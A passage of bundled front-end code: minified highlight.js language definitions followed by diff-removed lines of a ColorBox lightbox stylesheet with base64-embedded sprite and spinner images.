c=[a.BNM,a.CNM];var d={cN:"title",b:a.UIR};return{cI:true,k:"and include_once list abstract global private echo interface as static endswitch array null if endwhile or const for endforeach self var while isset public protected exit foreach throw elseif include __FILE__ empty require_once do xor return implements parent clone use __CLASS__ __LINE__ else break print eval new catch __METHOD__ case exception php_user_filter default die require __FUNCTION__ enddeclare final try this switch continue endfor endif declare unset true false namespace trait goto instanceof insteadof __DIR__ __NAMESPACE__ __halt_compiler",c:[a.CLCM,a.HCM,{cN:"comment",b:"/\\*",e:"\\*/",c:[{cN:"phpdoc",b:"\\s@[A-Za-z]+"}]},{cN:"comment",eB:true,b:"__halt_compiler.+?;",eW:true},{cN:"string",b:"<<<['\"]?\\w+['\"]?$",e:"^\\w+;",c:[a.BE]},{cN:"preprocessor",b:"<\\?php",r:10},{cN:"preprocessor",b:"\\?>"},e,{cN:"function",bWK:true,e:"{",k:"function",i:"\\$|\\[|%",c:[d,{cN:"params",b:"\\(",e:"\\)",c:["self",e,a.CBLCLM].concat(b).concat(c)}]},{cN:"class",bWK:true,e:"{",k:"class",i:"[:\\(\\$]",c:[{bWK:true,eW:true,k:"extends",c:[d]},d]},{b:"=>"}].concat(b).concat(c)}}(hljs);hljs.LANGUAGES.python=function(a){var f={cN:"prompt",b:"^(>>>|\\.\\.\\.) "};var c=[{cN:"string",b:"(u|b)?r?'''",e:"'''",c:[f],r:10},{cN:"string",b:'(u|b)?r?"""',e:'"""',c:[f],r:10},{cN:"string",b:"(u|r|ur)'",e:"'",c:[a.BE],r:10},{cN:"string",b:'(u|r|ur)"',e:'"',c:[a.BE],r:10},{cN:"string",b:"(b|br)'",e:"'",c:[a.BE]},{cN:"string",b:'(b|br)"',e:'"',c:[a.BE]}].concat([a.ASM,a.QSM]);var e={cN:"title",b:a.UIR};var d={cN:"params",b:"\\(",e:"\\)",c:["self",a.CNM,f].concat(c)};var b={bWK:true,e:":",i:"[${=;\\n]",c:[e,d],r:10};return{k:{keyword:"and elif is global as in if from raise for except finally print import pass return exec else break not with class assert yield try while continue del or def lambda nonlocal|10",built_in:"None True False Ellipsis NotImplemented"},i:"(</|->|\\?)",c:c.concat([f,a.HCM,a.inherit(b,{cN:"function",k:"def"}),a.inherit(b,{cN:"class",k:"class"}),a.CNM,{cN:"decorator",b:"@",e:"$"},{b:"\\b(print|exec)\\("}])}}(hljs);hljs.LANGUAGES.sql=function(a){return{cI:true,c:[{cN:"operator",b:"(begin|start|commit|rollback|savepoint|lock|alter|create|drop|rename|call|delete|do|handler|insert|load|replace|select|truncate|update|set|show|pragma|grant)\\b(?!:)",e:";",eW:true,k:{keyword:"all partial global month current_timestamp using go revoke smallint indicator end-exec disconnect zone with character assertion to add current_user usage input local alter match collate real then rollback get read timestamp session_user not integer bit unique day minute desc insert execute like ilike|2 level decimal drop continue isolation found where constraints domain right national some module transaction relative second connect escape close system_user for deferred section cast current sqlstate allocate intersect deallocate numeric public preserve full goto initially asc no key output collation group by union session both last language constraint column of space foreign deferrable prior connection unknown action commit view or first into float year primary cascaded except restrict set references names table outer open select size are rows from prepare distinct leading create only next inner authorization schema corresponding option declare precision immediate else timezone_minute external varying translation true case exception join hour default double scroll value cursor descriptor values dec fetch procedure delete and false int is describe char as at in varchar null trailing any absolute current_time end grant privileges when cross check write current_date pad begin temporary exec time update catalog user sql date on identity timezone_hour natural whenever interval work order cascade diagnostics nchar having left call do handler load replace truncate start lock show pragma exists number",aggregate:"count sum min max avg"},c:[{cN:"string",b:"'",e:"'",c:[a.BE,{b:"''"}],r:0},{cN:"string",b:'"',e:'"',c:[a.BE,{b:'""'}],r:0},{cN:"string",b:"`",e:"`",c:[a.BE]},a.CNM]},a.CBLCLM,{cN:"comment",b:"--",e:"$"}]}}(hljs);hljs.LANGUAGES.vala=function(a){return{k:{keyword:"char uchar unichar int uint long ulong short ushort int8 int16 int32 int64 uint8 uint16 uint32 uint64 float double bool struct enum string void weak unowned owned async signal static abstract interface override while do for foreach else switch case break default return try catch public private protected internal using new this get set const stdout stdin stderr var",built_in:"DBus GLib CCode Gee Object",literal:"false true null"},c:[{cN:"class",bWK:true,e:"{",k:"class interface delegate namespace",c:[{bWK:true,k:"extends implements"},{cN:"title",b:a.UIR}]},a.CLCM,a.CBLCLM,{cN:"string",b:'"""',e:'"""',r:5},a.ASM,a.QSM,a.CNM,{cN:"preprocessor",b:"^#",e:"$",r:2},{cN:"constant",b:" [A-Z_]+ ",r:0}]}}(hljs);hljs.LANGUAGES.perl=function(e){var a="getpwent getservent quotemeta msgrcv scalar kill dbmclose undef lc ma syswrite tr send umask sysopen shmwrite vec qx utime local oct semctl localtime readpipe do return format read sprintf dbmopen pop getpgrp not getpwnam rewinddir qqfileno qw endprotoent wait sethostent bless s|0 opendir continue each sleep endgrent shutdown dump chomp connect getsockname die socketpair close flock exists index shmgetsub for endpwent redo lstat msgctl setpgrp abs exit select print ref gethostbyaddr unshift fcntl syscall goto getnetbyaddr join gmtime symlink semget splice x|0 getpeername recv log setsockopt cos last reverse gethostbyname getgrnam study formline endhostent times chop length gethostent getnetent pack getprotoent getservbyname rand mkdir pos chmod y|0 substr endnetent printf next open msgsnd readdir use unlink getsockopt getpriority rindex wantarray hex system getservbyport endservent int chr untie rmdir prototype tell listen fork shmread ucfirst setprotoent else sysseek link getgrgid shmctl waitpid unpack getnetbyname reset chdir grep split require caller lcfirst until warn while values shift telldir getpwuid my getprotobynumber delete and sort uc defined srand accept package seekdir getprotobyname semop our rename seek if q|0 chroot sysread setpwent no crypt getc chown sqrt write setnetent setpriority foreach tie sin msgget map stat getlogin unless elsif truncate exec keys glob tied closedirioctl socket readlink eval xor readline binmode setservent eof ord bind alarm pipe atan2 getgrent exp time push setgrent gt lt or ne m|0 break given say state when";var d={cN:"subst",b:"[$@]\\{",e:"\\}",k:a,r:10};var b={cN:"variable",b:"\\$\\d"};var i={cN:"variable",b:"[\\$\\%\\@\\*](\\^\\w\\b|#\\w+(\\:\\:\\w+)*|[^\\s\\w{]|{\\w+}|\\w+(\\:\\:\\w*)*)"};var f=[e.BE,d,b,i];var h={b:"->",c:[{b:e.IR},{b:"{",e:"}"}]};var g={cN:"comment",b:"^(__END__|__DATA__)",e:"\\n$",r:5};var c=[b,i,e.HCM,g,{cN:"comment",b:"^\\=\\w",e:"\\=cut",eW:true},h,{cN:"string",b:"q[qwxr]?\\s*\\(",e:"\\)",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\[",e:"\\]",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\{",e:"\\}",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\|",e:"\\|",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\<",e:"\\>",c:f,r:5},{cN:"string",b:"qw\\s+q",e:"q",c:f,r:5},{cN:"string",b:"'",e:"'",c:[e.BE],r:0},{cN:"string",b:'"',e:'"',c:f,r:0},{cN:"string",b:"`",e:"`",c:[e.BE]},{cN:"string",b:"{\\w+}",r:0},{cN:"string",b:"-?\\w+\\s*\\=\\>",r:0},{cN:"number",b:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",r:0},{b:"("+e.RSR+"|\\b(split|return|print|reverse|grep)\\b)\\s*",k:"split return print reverse grep",r:0,c:[e.HCM,g,{cN:"regexp",b:"(s|tr|y)/(\\\\.|[^/])*/(\\\\.|[^/])*/[a-z]*",r:10},{cN:"regexp",b:"(m|qr)?/",e:"/[a-z]*",c:[e.BE],r:0}]},{cN:"sub",bWK:true,e:"(\\s*\\(.*?\\))?[;{]",k:"sub",r:5},{cN:"operator",b:"-\\w\\b",r:0}];d.c=c;h.c[1].c=c;return{k:a,c:c}}(hljs);hljs.LANGUAGES.scala=function(a){var c={cN:"annotation",b:"@[A-Za-z]+"};var b={cN:"string",b:'u?r?"""',e:'"""',r:10};return{k:"type yield lazy override def with val var false true sealed abstract private trait object null if for while throw finally protected extends import final return else break new catch super class case package default try this match continue throws",c:[{cN:"javadoc",b:"/\\*\\*",e:"\\*/",c:[{cN:"javadoctag",b:"@[A-Za-z]+"}],r:10},a.CLCM,a.CBLCLM,a.ASM,a.QSM,b,{cN:"class",b:"((case )?class |object |trait )",e:"({|$)",i:":",k:"case class trait object",c:[{bWK:true,k:"extends with",r:10},{cN:"title",b:a.UIR},{cN:"params",b:"\\(",e:"\\)",c:[a.ASM,a.QSM,b,c]}]},a.CNM,c]}}(hljs);hljs.LANGUAGES.cmake=function(a){return{cI:true,k:"add_custom_command add_custom_target add_definitions add_dependencies add_executable add_library add_subdirectory add_test aux_source_directory break build_command cmake_minimum_required cmake_policy configure_file create_test_sourcelist define_property else elseif enable_language enable_testing endforeach endfunction endif endmacro endwhile execute_process export find_file find_library find_package find_path find_program fltk_wrap_ui foreach function get_cmake_property get_directory_property get_filename_component get_property get_source_file_property get_target_property get_test_property if include include_directories include_external_msproject include_regular_expression install link_directories load_cache load_command macro mark_as_advanced message option output_required_files project qt_wrap_cpp qt_wrap_ui remove_definitions return separate_arguments set set_directory_properties set_property set_source_files_properties set_target_properties set_tests_properties site_name source_group string target_link_libraries try_compile try_run unset variable_watch while build_name exec_program export_library_dependencies install_files install_programs install_targets link_libraries make_directory remove subdir_depends subdirs use_mangled_mesa utility_source variable_requires write_file",c:[{cN:"envvar",b:"\\${",e:"}"},a.HCM,a.QSM,a.NM]}}(hljs);hljs.LANGUAGES.objectivec=function(a){var b={keyword:"int float while private char catch export sizeof typedef const struct for union unsigned long volatile static protected bool mutable if public do return goto void enum else break extern class asm case short default double throw register explicit signed typename try this switch continue wchar_t inline readonly assign property protocol self synchronized end synthesize id optional required implementation nonatomic interface super unichar finally dynamic IBOutlet IBAction selector strong weak readonly",literal:"false true FALSE TRUE nil YES NO NULL",built_in:"NSString NSDictionary CGRect CGPoint UIButton UILabel UITextView UIWebView MKMapView UISegmentedControl NSObject UITableViewDelegate UITableViewDataSource NSThread UIActivityIndicator UITabbar UIToolBar UIBarButtonItem UIImageView NSAutoreleasePool UITableView BOOL NSInteger CGFloat NSException NSLog NSMutableString NSMutableArray NSMutableDictionary NSURL NSIndexPath CGSize UITableViewCell UIView UIViewController UINavigationBar UINavigationController UITabBarController UIPopoverController UIPopoverControllerDelegate UIImage NSNumber UISearchBar NSFetchedResultsController NSFetchedResultsChangeType UIScrollView UIScrollViewDelegate UIEdgeInsets UIColor UIFont UIApplication NSNotFound NSNotificationCenter NSNotification UILocalNotification NSBundle NSFileManager NSTimeInterval NSDate NSCalendar NSUserDefaults UIWindow NSRange NSArray NSError NSURLRequest NSURLConnection class UIInterfaceOrientation MPMoviePlayerController dispatch_once_t dispatch_queue_t dispatch_sync dispatch_async dispatch_once"};return{k:b,i:"</",c:[a.CLCM,a.CBLCLM,a.CNM,a.QSM,{cN:"string",b:"'",e:"[^\\\\]'",i:"[^\\\\][^']"},{cN:"preprocessor",b:"#import",e:"$",c:[{cN:"title",b:'"',e:'"'},{cN:"title",b:"<",e:">"}]},{cN:"preprocessor",b:"#",e:"$"},{cN:"class",bWK:true,e:"({|$)",k:"interface class protocol implementation",c:[{cN:"id",b:a.UIR}]},{cN:"variable",b:"\\."+a.UIR}]}}(hljs);hljs.LANGUAGES.coffeescript=function(c){var b={keyword:"in if for while finally new do return else break catch instanceof throw try this switch continue typeof delete debugger super then unless until loop of by when and or is isnt not",literal:"true false null undefined yes no on off ",reserved:"case default function var void with const let enum export import native __hasProp __extends __slice __bind __indexOf"};var a="[A-Za-z$_][0-9A-Za-z$_]*";var e={cN:"title",b:a};var d={cN:"subst",b:"#\\{",e:"}",k:b,c:[c.BNM,c.CNM]};return{k:b,c:[c.BNM,c.CNM,c.ASM,{cN:"string",b:'"""',e:'"""',c:[c.BE,d]},{cN:"string",b:'"',e:'"',c:[c.BE,d],r:0},{cN:"comment",b:"###",e:"###"},c.HCM,{cN:"regexp",b:"///",e:"///",c:[c.HCM]},{cN:"regexp",b:"//[gim]*"},{cN:"regexp",b:"/\\S(\\\\.|[^\\n])*/[gim]*"},{b:"`",e:"`",eB:true,eE:true,sL:"javascript"},{cN:"function",b:a+"\\s*=\\s*(\\(.+\\))?\\s*[-=]>",rB:true,c:[e,{cN:"params",b:"\\(",e:"\\)"}]},{cN:"class",bWK:true,k:"class",e:"$",i:":",c:[{bWK:true,k:"extends",eW:true,i:":",c:[e]},e]},{cN:"property",b:"@"+a}]}}(hljs);hljs.LANGUAGES.r=function(a){var b="([a-zA-Z]|\\.[a-zA-Z.])[a-zA-Z0-9._]*";return{c:[a.HCM,{b:b,l:b,k:{keyword:"function if in break next repeat else for return switch while try tryCatch|10 stop warning require library attach detach source setMethod setGeneric setGroupGeneric setClass ...|10",literal:"NULL NA TRUE FALSE T F Inf NaN NA_integer_|10 NA_real_|10 NA_character_|10 NA_complex_|10"},r:0},{cN:"number",b:"0[xX][0-9a-fA-F]+[Li]?\\b",r:0},{cN:"number",b:"\\d+(?:[eE][+\\-]?\\d*)?L\\b",r:0},{cN:"number",b:"\\d+\\.(?!\\d)(?:i\\b)?",r:0},{cN:"number",b:"\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d*)?i?\\b",r:0},{cN:"number",b:"\\.\\d+(?:[eE][+\\-]?\\d*)?i?\\b",r:0},{b:"`",e:"`",r:0},{cN:"string",b:'"',e:'"',c:[a.BE],r:0},{cN:"string",b:"'",e:"'",c:[a.BE],r:0}]}}(hljs);hljs.LANGUAGES.json=function(a){var e={literal:"true false null"};var d=[a.QSM,a.CNM];var c={cN:"value",e:",",eW:true,eE:true,c:d,k:e};var b={b:"{",e:"}",c:[{cN:"attribute",b:'\\s*"',e:'"\\s*:\\s*',eB:true,eE:true,c:[a.BE],i:"\\n",starts:c}],i:"\\S"};var f={b:"\\[",e:"\\]",c:[a.inherit(c,{cN:null})],i:"\\S"};d.splice(d.length,0,b,f);return{c:d,k:e,i:"\\S"}}(hljs);hljs.LANGUAGES.django=function(c){function e(h,g){return(g==undefined||(!h.cN&&g.cN=="tag")||h.cN=="value")}function f(l,k){var g={};for(var j in l){if(j!="contains"){g[j]=l[j]}var m=[];for(var h=0;l.c&&h<l.c.length;h++){m.push(f(l.c[h],l))}if(e(l,k)){m=b.concat(m)}if(m.length){g.c=m}}return g}var d={cN:"filter",b:"\\|[A-Za-z]+\\:?",eE:true,k:"truncatewords removetags linebreaksbr yesno get_digit timesince random striptags filesizeformat escape linebreaks length_is ljust rjust cut urlize fix_ampersands title floatformat capfirst pprint divisibleby add make_list unordered_list urlencode timeuntil urlizetrunc wordcount stringformat linenumbers slice date dictsort dictsortreversed default_if_none pluralize lower join center default truncatewords_html upper length phone2numeric wordwrap time addslashes slugify first escapejs force_escape iriencode last safe safeseq truncatechars localize unlocalize localtime utc timezone",c:[{cN:"argument",b:'"',e:'"'}]};var b=[{cN:"template_comment",b:"{%\\s*comment\\s*%}",e:"{%\\s*endcomment\\s*%}"},{cN:"template_comment",b:"{#",e:"#}"},{cN:"template_tag",b:"{%",e:"%}",k:"comment endcomment load templatetag ifchanged endifchanged if endif firstof for endfor in ifnotequal endifnotequal widthratio extends include spaceless endspaceless regroup by as ifequal endifequal ssi now with cycle url filter endfilter debug block endblock else autoescape endautoescape csrf_token empty elif endwith static trans blocktrans endblocktrans get_static_prefix get_media_prefix plural get_current_language language get_available_languages get_current_language_bidi get_language_info get_language_info_list localize endlocalize localtime endlocaltime timezone endtimezone get_current_timezone",c:[d]},{cN:"variable",b:"{{",e:"}}",c:[d]}];var a=f(c.LANGUAGES.xml);a.cI=true;return a}(hljs);hljs.LANGUAGES.cpp=function(a){var b={keyword:"false int float while private char catch export virtual operator sizeof dynamic_cast|10 typedef const_cast|10 const struct for static_cast|10 union namespace unsigned long throw volatile static protected bool template mutable if public friend do return goto auto void enum else break new extern using true class asm case typeid short reinterpret_cast|10 default double register explicit signed typename try this switch continue wchar_t inline delete alignof char16_t char32_t constexpr decltype noexcept nullptr static_assert thread_local restrict _Bool complex",built_in:"std string cin cout cerr clog stringstream istringstream ostringstream auto_ptr deque list queue stack vector map set bitset multiset multimap unordered_set unordered_map unordered_multiset unordered_multimap array shared_ptr"};return{k:b,i:"</",c:[a.CLCM,a.CBLCLM,a.QSM,{cN:"string",b:"'\\\\?.",e:"'",i:"."},{cN:"number",b:"\\b(\\d+(\\.\\d*)?|\\.\\d+)(u|U|l|L|ul|UL|f|F)"},a.CNM,{cN:"preprocessor",b:"#",e:"$"},{cN:"stl_container",b:"\\b(deque|list|queue|stack|vector|map|set|bitset|multiset|multimap|unordered_map|unordered_set|unordered_multiset|unordered_multimap|array)\\s*<",e:">",k:b,r:10,c:["self"]}]}}(hljs);hljs.LANGUAGES.matlab=function(a){var b=[a.CNM,{cN:"string",b:"'",e:"'",c:[a.BE,{b:"''"}],r:0}];return{k:{keyword:"break case catch classdef continue else elseif end enumerated events for function global if methods otherwise parfor persistent properties return spmd switch try while",built_in:"sin sind sinh asin asind asinh cos cosd cosh acos acosd acosh tan tand tanh atan atand atan2 atanh sec secd sech asec asecd asech csc cscd csch acsc acscd acsch cot cotd coth acot acotd acoth hypot exp expm1 log log1p log10 log2 pow2 realpow reallog realsqrt sqrt nthroot nextpow2 abs angle complex conj imag real unwrap isreal cplxpair fix floor ceil round mod rem sign airy besselj bessely besselh besseli besselk beta betainc betaln ellipj ellipke erf erfc erfcx erfinv expint gamma gammainc gammaln psi legendre cross dot factor isprime primes gcd lcm rat rats perms nchoosek factorial cart2sph cart2pol pol2cart sph2cart hsv2rgb rgb2hsv zeros ones eye repmat rand randn linspace logspace freqspace meshgrid accumarray size length ndims numel disp isempty isequal isequalwithequalnans cat reshape diag blkdiag tril triu fliplr flipud flipdim rot90 find sub2ind ind2sub bsxfun ndgrid permute ipermute shiftdim circshift squeeze isscalar isvector ans eps realmax realmin pi i inf nan isnan isinf isfinite j why compan gallery hadamard hankel hilb invhilb magic pascal rosser toeplitz vander wilkinson"},i:'(//|"|#|/\\*|\\s+/\\w+)',c:[{cN:"function",bWK:true,e:"$",k:"function",c:[{cN:"title",b:a.UIR},{cN:"params",b:"\\(",e:"\\)"},{cN:"params",b:"\\[",e:"\\]"}]},{cN:"transposed_variable",b:"[a-zA-Z_][a-zA-Z_0-9]*('+[\\.']*|[\\.']+)",e:""},{cN:"matrix",b:"\\[",e:"\\]'*[\\.']*",c:b},{cN:"cell",b:"\\{",e:"\\}'*[\\.']*",c:b},{cN:"comment",b:"\\%",e:"$"}].concat(b)}}(hljs);
-</script>
-<!-- END extlib/js/highlight-7.3.pack.min.js -->
-<!-- START extlib/css/colorbox.css -->
-<style id="style:extlib/css/colorbox.css">/*
-    ColorBox Core Style:
-    The following CSS is consistent between example themes and should not be altered.
-*/
-#colorbox, #cboxOverlay, #cboxWrapper{position:absolute; top:0; left:0; z-index:9999; overflow:hidden;}
-#cboxOverlay{position:fixed; width:100%; height:100%;}
-#cboxMiddleLeft, #cboxBottomLeft{clear:left;}
-#cboxContent{position:relative;}
-#cboxLoadedContent{overflow:auto;}
-#cboxTitle{margin:0;}
-#cboxLoadingOverlay, #cboxLoadingGraphic{position:absolute; top:0; left:0; width:100%; height:100%;}
-#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{cursor:pointer;}
-.cboxPhoto{float:left; margin:auto; border:0; display:block; max-width:none;}
-.cboxIframe{width:100%; height:100%; display:block; border:0;}
-#colorbox, #cboxContent, #cboxLoadedContent{box-sizing:content-box;}
-
-/*
-    User Style:
-    Change the following styles to modify the appearance of ColorBox.  They are
-    ordered & tabbed in a way that represents the nesting of the generated HTML.
-*/
-#cboxOverlay{background:#000;}
-
-#colorbox{}
-
-        #cboxTitle{position:absolute; bottom:-25px; left:0; text-align:center; width:100%; font-weight:bold; color:#7C7C7C;}
-        #cboxCurrent{position:absolute; bottom:-25px; left:58px; font-weight:bold; color:#7C7C7C;}
-
-        #cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{position:absolute; bottom:-29px; background-repeat: no-repeat; background-position: 0px 0px; width:23px; height:23px; text-indent:-9999px;}
-        #cboxPrevious{left:0px; background-position: -51px -25px;}
-        #cboxPrevious:hover{background-position:-51px 0px;}
-        #cboxNext{left:27px; background-position:-75px -25px;}
-        #cboxNext:hover{background-position:-75px 0px;}
-        #cboxClose{right:0; background-position:-100px -25px;}
-        #cboxClose:hover{background-position:-100px 0px;}
-
-        .cboxSlideshow_on #cboxSlideshow{background-position:-125px 0px; right:27px;}
-        .cboxSlideshow_on #cboxSlideshow:hover{background-position:-150px 0px;}
-        .cboxSlideshow_off #cboxSlideshow{background-position:-150px -25px; right:27px;}
-        .cboxSlideshow_off #cboxSlideshow:hover{background-position:-125px 0px;}
-
-/* begin inline customizing */
-
-    #cboxBottomCenter{height:43px; background-repeat: repeat-x; background-position: bottom left;}
-    #cboxTopCenter{height:14px; background-repeat: repeat-x; background-position: top left;}
-
-    #cboxBottomCenter, #cboxTopCenter {background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAABLCAMAAACGCB2xAAAAM1BMVEVSUlJHR0dPT09BQUFLS0tQUFA6OjpgYGCKioozMzPS0tJaWlpRUVHy8vKJiYn////m5eV3dK93AAAAK0lEQVR4XqXBhQ2AQBAAsJ48bvtPywyE1GLGYUgtlPuT0+b5abealNDScL0YiAPSV/RH9wAAAABJRU5ErkJggg==);}
-
-    #cboxTopLeft, #cboxTopRight, #cboxBottomLeft, #cboxBottomRight, #cboxMiddleLeft,
-
-    #cboxMiddleRight, #cboxContent,#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow {
-        background-image:url(data:image/png;base64,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);
-    }
-
-    #cboxTopLeft{width:14px; height:14px; background-repeat: no-repeat; background-position: 0 0;}
-    #cboxTopRight{width:14px; height:14px; background-repeat: no-repeat; background-position: -36px 0;}
-    #cboxBottomLeft{width:14px; height:43px; background-repeat: no-repeat; background-position: 0 -32px;}
-    #cboxBottomRight{width:14px; height:43px;  background-repeat: no-repeat; background-position: -36px -32px;}
-    #cboxMiddleLeft{width:14px; background-repeat: repeat-y; background-position: -175px 0;}
-    #cboxMiddleRight{width:14px; background-repeat: repeat-y; background-position: -211px 0;}
-    #cboxContent{background:#fff; overflow:visible;}
-
-
-
-        .cboxIframe{background:#fff;}
-        #cboxError{padding:50px; border:1px solid #ccc;}
-        #cboxLoadedContent{margin-bottom:5px;}
-        #cboxLoadingOverlay{background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoBAMAAAB+0KVeAAAAElBMVEX///////////8AAAD///////9H1zSfAAAABXRSTlPvgBAAz5JLnNUAAAA+SURBVHhe7dMhAQAgEEPRIfAYEkCCi0ACEOtfBc8WAHFfPr0hGp/KwKS00BUPquIGTZ9gYqIdrZ23PYK9zAX6sAYavSqAMgAAAABJRU5ErkJggg==);
-         background-repeat: no-repeat; background-position: center center;}
-        #cboxLoadingGraphic{background: url(data:image/gif;base64,R0lGODlhIAAgAPYAAP////9VAP77+v7j1v7m2v78/P7Quv6qgP6wiv7UwP749v7v6P6viP6ofv6/oP7u5v6fcP6LUv6rgv7s5P728v6nfP7Aov7Irv54Nv57Ov5/QP6bav7n3P739P6mev7Dpv76+P7ayP58PP6cbP7w6v6+nv6keP7Tvv7g0v53NP56OP7HrP7Yxv7czP7z7v7i1P50MP7MtP7SvP7EqP708P6ebv62kv7k2P7r4v6uhv5gEv5fEP5sJP5eDv5zLv67mv7q4P7o3v7y7P7KsP68nP64lv6WYv6zjv63lP6DRv6HTP6KUP6CRP6GSv60kP7ezv6ESP6AQv7f0P7Wwv6ITv66mP5mGv5vKP52Mv5jFv5iFP7PuP6QWv6MVP7CpP6gcv6PWP6TXv6XZP6SXP6OVv5rIv5qIP5oHv5wKv7byv7XxP6aaP7Otv6YZv5yLP7Gqv5kGP6UYP5nHP6idP6jdv7Lsv5uJv6shP5+Pv6yjP5cDAAAAAAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh/hpDcmVhdGVkIHdpdGggYWpheGxvYWQuaW5mbwAh+QQJBQAAACwAAAAAIAAgAAAH/4AAgoOEhYaHiImKi4yNjo+QkZKECzk2NJOCDxchgwU1OjsSmQoQGCIWghQiOz01npALERkYGQ4AFBqtP4ILN0ACjgISGhkpGDIANjw+KABCKNEujxMbGiowowAEHIIT0SgUkBwjGiIzhkIvKDiSJCsxwYYdmI8KFB0FjfqLAgYMEiSUEJeoAJABBAgiGnCgQQUPJlgoIgGuWyICCBhoRNBCEbRoFhEVSODAwocTIBQVwEEgiMJEChSkzNTPRQdEFF46KsABxYtphUisAxLpW7QJgkDMx